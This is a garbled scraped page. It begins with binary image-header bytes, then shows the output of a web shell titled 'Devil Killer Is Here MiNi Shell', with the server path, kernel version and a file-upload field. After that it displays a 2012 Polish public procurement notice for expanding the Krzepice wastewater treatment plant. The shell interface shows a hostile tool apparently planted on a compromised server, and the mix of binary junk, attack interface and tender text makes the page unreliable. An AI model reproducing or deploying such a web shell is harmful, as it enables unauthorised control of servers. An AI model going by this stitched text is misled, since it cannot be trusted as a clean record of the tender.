JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121126/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121126/472040-N-2012.html

<p class="kh_header"><b>Krzepice: Przebudowa i rozbudowa oczyszczalni ścieków w Krzepicach wraz z infrastrukturą towarzyszącą</b><br>
<b>Numer ogłoszenia: 472040 - 2012; data zamieszczenia: 26.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Działalności Komunalnej i Mieszkaniowej , ul. Targowa 19, 42-160 Krzepice, woj. śląskie, tel. 0-34 317 51 02, faks 0-34 317 61 06.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdkim.krzepice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład budżetowy jednostki samorządowej..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i rozbudowa oczyszczalni ścieków w Krzepicach wraz z infrastrukturą towarzyszącą.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa i rozbudowa oczyszczalni ścieków w Krzepicach wraz z infrastrukturą towarzyszącą.
Oczyszczalnia ścieków położona jest w północno - wschodniej części Krzepic, poza zabudową mieszkalną, w obrębie ulicy Kazimierza Wielkiego. Teren oczyszczalni zlokalizowany jest na działkach o nr. ew. 313/1, 313/2 i 330. Projektowany wylot ścieków oczyszczonych do odbiornika znajduje się na działce o nr. ew. 48.
Cel i zakres przedmiotu zamówienia. 
Przedmiotem zamówienia jest wykonanie przebudowy i rozbudowy oczyszczalni ścieków w Krzepicach. Obecnie przepustowość hydrauliczna oczyszczalni dla wykonanego etapu wynosi 1 080 m3/dobę. Oczyszczalnia jest wykonana jako mechaniczno -  biologiczna, pracująca w technologii sekwencyjnych reaktorów biologicznych (SBR). W ramach modernizacji i rozbudowy oczyszczalni ścieków nie przewiduje się zmiany technologii biologiczno-mechanicznego oczyszczania ścieków, a jedynie wykonanie  niezbędnych nowych obiektów gospodarki ściekowej i osadowej oraz modernizację istniejących obiektów tak aby  pozwalały na spełnienie zarówno warunków biologicznych jak i hydraulicznych prawidłowego oczyszczania napływających ścieków. Po rozbudowie przepustowość hydrauliczna oczyszczalni w Krzepicach wzrośnie do 1 620 m3/dobę.
W ramach zamówienia przewiduje się wybudowanie nowych obiektów, modernizację istniejących oraz likwidację części obiektów obecnie istniejących.
Nowo projektowane obiekty do wykonania.
W skład nowo projektowanych obiektów do wykonania wchodzi:
1. Reaktor biologiczny SBR o średnicy wewnętrznej O14,0m i pojemności czynnej Vcz=677m3 - 1szt.;
2. Komora tlenowej stabilizacji osadu o średnicy wewnętrznej O10,0m i pojemności czynnej Vcz=314m3 - 1szt.;
3. Grawitacyjny zagęszczacz osadu o średnicy wewnętrznej O7,0m i pojemności czynnej Vcz=115m3 - 1szt.;
4. Pompownia osadu zbudowana jako podziemny zbiornik żelbetowy zlokalizowany w bezpośrednim sąsiedztwie zagęszczacza osadu -1szt.;
5. Komora rozdziału o wymiarach w świetle 2,7m x 1,9m i wysokości 2,0m - 1szt.;
6. Komora przepływomierza o wymiarach w świetle 3,9m x 1,9m i wysokości 2,0m zbudowana jako podziemny zbiornik żelbetowy - 1szt.;
7. Wylot ścieków oczyszczonych do rzeki Liswarty w km 35+320 km biegu rzeki. Nowy wylot zostanie umiejscowionego w bezpośrednim sąsiedztwie oczyszczalni ścieków. Wylot wykonany zostanie w formie betonowego prefabrykatu. Ubezpieczenie skarpy rzeki Liswarty w rejonie wylotu oraz skarpy przeciwległej stanowić będzie geowłóknina oraz kosze gabionowe o wymiarach 100 x 100 x 50 cm (dł. x szer. x wys.) ułożone na odcinku 6,6 m, tj. po 3,0 m poniżej i powyżej wylotu ścieków. Dno rzeki ubezpieczone zostanie narzutem kamiennym zabezpieczonym palisadą na całej szerokości umacnianego odcinka rzeki
8. Basen służący do odprowadzania piany powstałej w reaktorach biologicznych zbudowany jako zbiornik żelbetowy o pojemności czynnej Vcz=75m3 -1szt.;
9. Neutralizator ścieków chemicznych z tacy dezynfekcyjnej o pojemności V=1,5m3  	  wykonany z kręgów betonowych o średnicy wewnętrznej O1200mm - 1 szt.;
10. Kontener przy zlewni nieczystości płynnych z  układem odbiorczo-pomiarowym 	   identyfikującym przewoźnika ścieków dowożonych - 1 sztuka.;
11. Aparatura kontrolno pomiarowa i automatyka sterowania pracą oczyszczalni.
12. System sterowania pracą oczyszczalni.
13.  Instalacje elektryczne
Istniejące obiekty do przebudowy i modernizacji na oczyszczalni. 
14. Pompownia ścieków surowych - 1 sztuka.;
15. Reaktory biologiczne SBR - 2 sztuki.;
16. Komora tlenowej stabilizacji osadu KTS - 1 sztuka.;
17. Zlewnia nieczystości płynnych wraz z  projektowanym kontenerem z układem  	   odbiorczo-pomiarowym identyfikujący przewoźnika - 1 sztuka.;
18. Taca dezynfekcyjna - 1 sztuka.;
19. Stacja dmuchaw. 
Obiekty przeznaczone do likwidacji:
1. Stawy sedymentacyjne.
2. Studzienka pomiarowa ścieków oczyszczonych.
3. Istniejący wylot ścieków oczyszczonych do rowu R- A2.

Roboty budowlane muszą być wykonywane i zorganizowane w taki sposób, że obecna oczyszczalnia musi na bieżąco funkcjonować, pracować, tj. przyjmować ścieki i odpowiednio je oczyszczać, zgodnie z istniejącym pozwoleniem wodnoprawnym.

Wykonanie przedmiotu zamówienia podzielone zostało na dwa etapy. 
ETAP I
W tym etapie  należy wykonać kompletne i działające następujące obiekty oczyszczalni:

1. Pompownia ścieków surowych - przebudowa istniejącej. 
2. Reaktor biologiczny SBR - projektowany.
3. Komora tlenowej stabilizacji osadu KTS - projektowana.
4. Komora rozdziału - projektowana.
5. Komora przepływomierza - projektowana.
6. Wylot ścieków oczyszczonych do rzeki Liswarty w km 35+320 km biegu rzeki -    projektowany.
7. Zagęszczacz wraz z komorą pompowni osadu - projektowany.
8. Niezbędne sieci międzyobiektowe.
9. Niezbędne instalacje elektryczne i aparatura AKPiU.
10. Niezbędne prace demontażowe.

ETAP II
Po wykonaniu etapu I i przeniesieniu procesu oczyszczania do nowo wybudowanych obiektów należy wykonać prace w następujących obiektach:

1. Reaktory biologiczne- przebudowa istniejących.
2. Komora tlenowej stabilizacji osadu KTS - przebudowa istniejącej.
3.Basen na pianę-projektowany.
4. Taca dezynfekcyjna - przebudowa istniejącej.
5. Neutralizator ścieków chemicznych z tacy dezynfekcyjnej- projektowany.
6. Zlewnia nieczystości płynnych - istniejąca (doposażona będzie w, zlokalizowany w  projektowanym kontenerze, układ odbiorczo-pomiarowy identyfikujący przewoźnika).
7 . Stacja dmuchaw - przebudowa istniejącej.
8. Pozostałe  sieci międzyobiektowe.
9. Pozostałe instalacje elektryczne i aparatura AKPiU.
10. Prace demontażowe (stawy sedymentacyjne).
11. Prace kontrolno - pomiarowe.
12. Oprogramowanie sterowników oraz prace rozruchowe automatyki.
13. Zagospodarowanie terenu- drogi, chodniki i opaski.
14. Rozruch technologiczny oczyszczalni ścieków.
15. Prace porządkowe.
16. Dokumentacja powykonawcza.

Szczegółowo przedmiot zamówienia określa dokumentacja projektowa - wielobranżowy
projekt budowlany i wykonawczy, specyfikacja techniczna wykonania i odbioru robót budowlanych oraz przedmiary robót.
Projekt architektoniczno-budowlany obejmuje branże: budowlaną, technologiczną, elektryczną z automatyką oraz zagospodarowanie terenu.

W ramach wykonania przedmiotu zamówienia należy także uwzględnić:

- przeprowadzenie badań archeologicznych polegających na wykonaniu sondażu archeologicznego na przebiegu kanalizacji do miejsca zrzutu oczyszczonej wody do rzeki Liswarty oraz nadzór archeologiczny przy pracach ziemnych związanych z wykonaniem zbiorników (szerokopłaszczyznowych) i infrastrukturą techniczną (wykopy liniowe). 

- wykonanie wszelkich niezbędnych robót przygotowawczych związanych z realizacją przedmiotu zamówienia, a w szczególności: wykonanie niezbędnych przekładek, przebudów lub rozbiórek instalacji lub obiektów kolidujących z budową oraz wykonanie wszelkich instalacji, niezbędnych obiektów tymczasowych potrzebnych do prawidłowego funkcjonowania budowy i istniejącej oczyszczalni,

- wykonanie dokumentacji powykonawczej na podstawie dokumentacji technicznej wraz ze wszelkimi koniecznymi protokołami odbiorów, pomiarów i sprawdzeń niezbędnymi do odbioru i przekazania do użytkowania oraz stwierdzenia prawidłowego funkcjonowania wszystkich obiektów z osobna jak i w całości,

- wykonanie instrukcji eksploatacji i użytkowania dla wszystkich urządzeń i systemów
znajdujących się w przedmiocie umowy i niezbędnych do jego prawidłowego funkcjonowania oraz dla całej oczyszczalni ścieków

- skuteczne przeprowadzenie rozruchu technologicznego i uzyskanie pozwolenia na użytkowanie oraz ostatecznej decyzji - pozwolenia wodnoprawnego na wprowadzenie oczyszczonych ścieków do wód poprzez nowo zrealizowany układ technologiczny oczyszczalni,

- przeszkolenie personelu Zamawiającego w pełnym zakresie niezbędnym do prawidłowego funkcjonowania przedmiotu umowy. 

Zamawiający zaleca, aby wykonawcy przed opracowaniem swojej oferty dokonali wizji lokalnej terenu objętego przedmiotem zamówienia. Wizji lokalnej można dokonywać po uprzednim telefonicznym uzgodnieniu terminu z Zamawiającym.

W przypadku opisania przez projektanta materiałów czy urządzeń przy użyciu nazw, patentów, producenta, Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych materiałów i urządzeń niż podane w dokumentacji projektowej pod warunkiem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, uwiarygadniających te materiały i urządzenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.00-9, 45.25.22.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta winna być zabezpieczona wadium wniesionym przed terminem złożenia ofert do dnia 20.12.2012 r. godz.11.00. w wysokości 30.000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia zgodnie z art. 22 ust.1.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Powyższy warunek zostanie spełniony jeśli w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, zgodnie z zasadami sztuki budowlanej wykonali i prawidłowo ukończyli co najmniej 2 roboty budowlane polegające na budowie lub rozbudowie lub modernizacji mechaniczno-biologicznej oczyszczalni ścieków o przepustowości minimum 1.000 m3/dobę i wartości co najmniej 2.500.000,00 złotych brutto, każda z robót budowlanych, w tym co najmniej 1 robota polegająca na budowie lub rozbudowie lub modernizacji w ruchu eksploatacyjnym mechaniczno- biologicznej oczyszczalni ścieków.  Roboty muszą być potwierdzone dokumentami, że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia zgodnie z art. 22 ust.1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą się ubiegać Wykonawcy, którzy dysponują osobami , które wykonywać będą zamówienie  lub pisemne zobowiązanie innych podmiotów do udostępnienia  tych osób, w tym: a) przynajmniej 1 osobą Kierownika budowy posiadającą wykształcenie wyższe oraz uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej, posiadającą co najmniej 5 letnie doświadczenie zawodowe, w tym pełniła funkcję kierownika budowy, lub kierownika robót lub inspektora nadzoru na co najmniej 2 zadaniach inwestycyjnych związanym z budową lub rozbudową lub modernizacja oczyszczalni ścieków( o przepustowości minimum 1000 m3/d )
b)  przynajmniej 1 osobą Kierownika robót sanitarnych posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności sieci, instalacji i urządzeń cieplnych , wentylacyjnych , gazowych, wodociągowych i kanalizacyjnych, posiadającą co najmniej 3 letnie doświadczenie zawodowe w tym pełniła funkcję kierownika budowy, lub kierownika robót lub inspektora nadzoru na co najmniej 2 zadaniach inwestycyjnych związanym z budową lub rozbudową lub modernizacja oczyszczalni ścieków,
c)  przynajmniej 1 osobą Kierownika robót elektrycznych posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w zakresie sieci, instalacji urządzeń elektrycznych i elektroenergetycznych, posiadającą co najmniej 3 letnie doświadczenie zawodowe w tym pełniła funkcję kierownika budowy, lub kierownika robót lub inspektora nadzoru na co najmniej 2 zadaniach inwestycyjnych. 
Uwaga : Zamawiający dopuszcza łączenie stanowisk kierownika budowy i kierowników robót, jeżeli osoba będzie posiadała wymagane doświadczenie i kwalifikacje określone w SIWZ.
Uwaga: Zamawiający akceptuje uprawnienia budowlane odpowiadające uprawnieniom wymaganym przez Zamawiającego , które zostały wydane na podstawie wcześniej wydanych przepisów oraz zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w Ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 roku Nr 63 poz. 394); w przypadku zaproponowania osób wchodzących w skład kadry kierowniczej, które nie znają języka polskiego, Wykonawca powinien zapewnić tłumacza.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy dysponują środkami finansowymi w wysokości co najmniej 1.200.000,00 zł. na rachunku  bankowym lub w spółdzielczej kasie oszczędnościowo- kredytowej lub posiadają zdolność kredytową w wysokości co najmniej 1.200.000,00 zł.
 Wykonawcy  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż 1.000.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony przez Wykonawcę formularz ofertowy ( zał. Nr 1 ). 
2. Kosztorys ofertowy szczegółowy.
3. Potwierdzenie wniesienia wadium. 
4. Wstępny Harmonogram rzeczowo-finansowy zadania - zał. Nr 7. 
Szczegółowy harmonogram rzeczowo-finansowy przedłoży Zamawiającemu przy podpisaniu umowy  Wykonawca którego oferta zostanie wybrana jako najkorzystniejsza.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do umowy w przypadkach:
               a) gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest 
                   ze zmianą powszechnie obowiązujących przepisów prawa (np. w  zakresie zmiany 
                   wysokości stawki podatku VAT);
               b) konieczności zmiany terminu realizacji w związku z :
                 - koniecznością wprowadzenia zmian w dokumentacji projektowej, a wynikających 
                   z konieczności dostosowania zakresu zadania do wytycznych programowych lub 
                   powszechnie obowiązujących przepisów prawa (o czas niezbędny na wprowadzenie 
                   tych zmian) lub
                 - z brakiem możliwości prowadzenia robót na skutek obiektywnych warunków 
                   klimatycznych (o czas, w którym - na skutek tych zdarzeń - nie było możliwe 
